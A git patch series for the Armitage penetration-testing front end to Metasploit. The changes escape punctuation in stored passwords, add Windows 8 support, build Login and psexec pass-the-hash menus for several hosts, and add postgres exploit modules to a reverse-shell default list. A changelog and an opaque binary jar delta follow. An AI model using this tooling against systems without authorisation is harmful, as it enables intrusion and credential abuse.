b/external/source/armitage/scripts-cortana/internal.sl index 33cf09c107..d434f920da 100644 --- a/external/source/armitage/scripts-cortana/internal.sl +++ b/external/source/armitage/scripts-cortana/internal.sl @@ -243,14 +243,18 @@ sub session_exploit { # credentials API # +sub _fix_pass { + return replace(strrep($1, '\\', '\\\\'), '(\p{Punct})', '\\\\$1'); +} + # credential_add("host", "port", "user, "pass", "type") sub credential_add { - cmd_safe("creds -a $1 -p $2 -t $5 -u $3 -P $4"); + cmd_safe("creds -a $1 -p $2 -t $5 -u $3 -P " . _fix_pass($4)); } # credential_delete("host", port, "user", "pass"); sub credential_delete { - cmd_safe("creds -a $1 -p $2 -u $3 -P $4 -d"); + cmd_safe("creds -a $1 -p $2 -u $3 -P " . _fix_pass($4) . " -d"); } sub credential_list { diff --git a/external/source/armitage/scripts/armitage.sl b/external/source/armitage/scripts/armitage.sl index b9a7354a6b..2cf69a9a97 100644 --- a/external/source/armitage/scripts/armitage.sl +++ b/external/source/armitage/scripts/armitage.sl @@ -59,6 +59,9 @@ sub showHost { else if ("*XP*" iswm $match || "*2003*" iswm $match || "*.NET*" iswm $match) { push(@overlay, 'resources/windowsxp.png'); } + else if ("*8*" iswm $match) { + push(@overlay, 'resources/windows8.png'); + } else { push(@overlay, 'resources/windows7.png'); } diff --git a/external/source/armitage/scripts/attacks.sl b/external/source/armitage/scripts/attacks.sl index a1315b4ae8..4940fb4474 100644 --- a/external/source/armitage/scripts/attacks.sl +++ b/external/source/armitage/scripts/attacks.sl @@ -22,7 +22,7 @@ setMissPolicy(%results2, { return @(); }); # %exploits is populated in menus.sl when the client-side attacks menu is constructed # a list of exploits that should always use a reverse shell... this list needs to grow. -@always_reverse = @("multi/samba/usermap_script", "unix/misc/distcc_exec", "windows/http/xampp_webdav_upload_php"); +@always_reverse = @("multi/samba/usermap_script", "unix/misc/distcc_exec", "windows/http/xampp_webdav_upload_php", "windows/postgres/postgres_payload", "linux/postgres/postgres_payload"); # # generate menus for a given OS @@ -599,26 +599,28 @@ sub host_attack_items { } } - local('$service $name @options $a $port $foo'); + local('$name %options $a $port $host $service'); + %options = ohash(); - foreach $port => $service (%hosts[$2[0]]['services']) { - $name = $service['name']; - if ($port == 445 && "*Windows*" iswm getHostOS($2[0])) { - push(@options, @("psexec", lambda(&pass_the_hash, $hosts => $2))); - } - else if ("scanner/ $+ $name $+ / $+ $name $+ _login" in @auxiliary) { - push(@options, @($name, lambda(&show_login_dialog, \$service, $hosts => $2))); - } - else if ($name eq "microsoft-ds") { - push(@options, @("psexec", lambda(&pass_the_hash, $hosts => $2))); + foreach $host ($2) { + foreach $port => $service (%hosts[$host]['services']) { + $name = $service['name']; + if ($port == 445 && "*Windows*" iswm getHostOS($host)) { + %options["psexec"] = lambda(&pass_the_hash, $hosts => $2); + } + else if ("scanner/ $+ $name $+ / $+ $name $+ _login" in @auxiliary) { + %options[$name] = lambda(&show_login_dialog, \$service, $hosts => $2); + } + else if ($name eq "microsoft-ds") { + %options["psexec"] = lambda(&pass_the_hash, $hosts => $2); + } } } - if (size(@options) > 0) { + if (size(%options) > 0) { $a = menu($1, 'Login', 'L'); - foreach $service (@options) { - ($name, $foo) = $service; - item($a, $name, $null, $foo); + foreach $name (sorta(keys(%options))) { + item($a, $name, $null, %options[$name]); } } } @@ -678,6 +680,7 @@ sub addFileListener { $actions["SigningKey"] = $actions["*FILE*"]; $actions["Wordlist"] = $actions["*FILE*"]; $actions["WORDLIST"] = $actions["*FILE*"]; + $actions["REXE"] = $actions["*FILE*"]; # set up an action to choose a session $actions["SESSION"] = lambda(&chooseSession); diff --git a/external/source/armitage/scripts/menus.sl b/external/source/armitage/scripts/menus.sl index ff5320666e..7c70ba2d62 100644 --- a/external/source/armitage/scripts/menus.sl +++ b/external/source/armitage/scripts/menus.sl @@ -52,6 +52,7 @@ sub host_selected_items { item($i, '1. 95/98/2000', '1', setHostValueFunction($2, "os_name", "Micosoft Windows", "os_flavor", "2000")); item($i, '2. XP/2003', '2', setHostValueFunction($2, "os_name", "Microsoft Windows", "os_flavor", "XP")); item($i, '3. Vista/7', '3', setHostValueFunction($2, "os_name", "Microsoft Windows", "os_flavor", "Vista")); + item($i, '4. 8/RT', '4', setHostValueFunction($2, "os_name", "Microsoft Windows", "os_flavor", "8")); item($h, "Remove Host", 'R', clearHostFunction($2)); } diff --git a/external/source/armitage/scripts/passhash.sl b/external/source/armitage/scripts/passhash.sl index 058422c038..19feb846c3 100644 --- a/external/source/armitage/scripts/passhash.sl +++ b/external/source/armitage/scripts/passhash.sl @@ -41,6 +41,7 @@ import ui.*; # strip any funky characters that will cause this call to throw an exception $user = replace($user, '\P{Graph}', ""); + $hash = fixPass($hash); [$queue addCommand: $null, "creds -a $host -p 445 -t smb_hash -u $user -P $hash"]; } @@ -106,6 +107,7 @@ sub createCredentialsTab { $queue = [new armitage.ConsoleQueue: $client]; foreach $entry ($entries) { ($user, $pass, $host) = $entry; + $pass = fixPass($pass); [$queue addCommand: $null, "creds -d $host -u $user -P $pass"]; } diff --git a/external/source/armitage/scripts/preferences.sl b/external/source/armitage/scripts/preferences.sl index 07dd458a4f..19ad929524 100644 --- a/external/source/armitage/scripts/preferences.sl +++ b/external/source/armitage/scripts/preferences.sl @@ -114,7 +114,12 @@ sub loadPreferences { sub loadDatabasePreferences { if ($yaml_file eq "" || !-exists $yaml_file) { - $yaml_file = getFileProper($BASE_DIRECTORY, "config", "database.yml"); + if (thisIsTheirCommercialStuff()) { + $yaml_file = getFileProper($BASE_DIRECTORY, "ui", "config", "database.yml"); + } + else { + $yaml_file = getFileProper($BASE_DIRECTORY, "config", "database.yml"); + } } if (!-exists $yaml_file) { @@ -340,6 +345,7 @@ sub createPreferencesTab { sub setupBaseDirectory { local('%o'); %o = call($client, "module.options", "post", "multi/gather/dns_bruteforce"); + if ("NAMELIST" in %o && "default" in %o["NAMELIST"]) { $BASE_DIRECTORY = getFileParent(getFileParent(getFileParent(getFileParent(%o["NAMELIST"]["default"])))); $DATA_DIRECTORY = getFileParent(getFileParent(%o["NAMELIST"]["default"])); @@ -385,3 +391,8 @@ sub dataDirectory { return $f; } + +sub thisIsTheirCommercialStuff { + # check if we're living in a Metasploit 4.5+ installer environment. + return iff("*app*pro*" iswm $BASE_DIRECTORY); +} diff --git a/external/source/armitage/scripts/util.sl b/external/source/armitage/scripts/util.sl index d1a64d0c85..feb7970db1 100644 --- a/external/source/armitage/scripts/util.sl +++ b/external/source/armitage/scripts/util.sl @@ -472,6 +472,15 @@ sub _module_execute { $host = "all"; } + # fix SMBPass and PASSWORD options if necessary... + if ("PASSWORD" in $3) { + $3['PASSWORD'] = fixPass($3['PASSWORD']); + } + + if ("SMBPass" in $3) { + $3['SMBPass'] = fixPass($3['SMBPass']); + } + # okie then, let's create a console and execute all of this stuff... local('$queue $key $value'); @@ -607,3 +616,8 @@ sub initConsolePool { [$client addHook: "console.release", $pool]; [$client addHook: "console.release_and_destroy", $pool]; } + +sub fixPass { + return replace(strrep($1, '\\', '\\\\'), '(\p{Punct})', '\\\\$1'); +} + diff --git a/external/source/armitage/src/cortana/Cortana.java b/external/source/armitage/src/cortana/Cortana.java index 7e1c7079f9..7dbc591e0c 100644 --- a/external/source/armitage/src/cortana/Cortana.java +++ b/external/source/armitage/src/cortana/Cortana.java @@ -428,13 +428,6 @@ public class Cortana implements Loadable, RuntimeWarningWatcher { /* start the timer thread */ new cortana.support.Heartbeat(events).start(); - - /* regularly communicate with Metasploit or else our connection will drop */ - new ArmitageTimer(client, "core.version", 200 * 1000L, new ArmitageTimerClient() { - public boolean result(String command, Object[] arguments, Map results) { - return true; - } - }, false); } started = true; } diff --git a/external/source/armitage/src/ui/ATable.java b/external/source/armitage/src/ui/ATable.java index dadc03f052..bc1569659c 100644 --- a/external/source/armitage/src/ui/ATable.java +++ b/external/source/armitage/src/ui/ATable.java @@ -25,6 +25,7 @@ public class ATable extends JTable { specialitems.add("SigningCert"); specialitems.add("WORDLIST"); specialitems.add("SESSION"); + specialitems.add("REXE"); return new TableCellRenderer() { public Component getTableCellRendererComponent(JTable table, Object value, boolean isSelected, boolean hasFocus, int row, int column) { diff --git a/external/source/armitage/whatsnew.txt b/external/source/armitage/whatsnew.txt index 207e8e00ff..5ea39884dd 100644 --- a/external/source/armitage/whatsnew.txt +++ b/external/source/armitage/whatsnew.txt @@ -1,6 +1,24 @@ Armitage Changelog ================== +4 Jan 13 (tested against msf 16252) +-------- +- Added a helper to set REXE option +- Added an icon to represent Windows 8 +- [host] -> Login menu is now built using open services for all + highlighted hosts, not just the first one. +- [host] -> Login items now escape punctuation characters in passwords + before passing them to a framework module. +- Added the windows and linux postgres_payload exploits to the use a + reverse payload by default list. +- Small tweak to allow Armitage to work with Metasploit 4.5 installed + environment on Windows. + +Cortana Updates (for scripters) +-------- +- &credential_add and &credential_delete no longer break when a + password has creative punctuation in it. + 26 Nov 12 (tested against msf 16114) --------- - Windows command shell tab is now friendlier to commands that prompt From 5348127fd23c03ba5259968c9c1f5028d4b0f7f2 Mon Sep 17 00:00:00 2001 From: Raphael Mudge Date: Fri, 4 Jan 2013 13:08:47 -0500 Subject: [PATCH 154/154] Metasploit 4.5 Installer Environment Tweak Armitage on Windows requires the user to specify their MSF install folder. This tweak checks for an MSF 4.5 environment and updates the specified folder to make everything work. Like magic. --- data/armitage/armitage.jar | Bin 3198925 -> 3198776 bytes external/source/armitage/scripts/util.sl | 5 +++++ 2 files changed, 5 insertions(+) diff --git a/data/armitage/armitage.jar b/data/armitage/armitage.jar index cc427103aa870d998b5ebd4e1764faab47b84113..5ccd4ac15a74d2250efd8513a419dde87aee1312 100755 GIT binary patch delta 17392 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 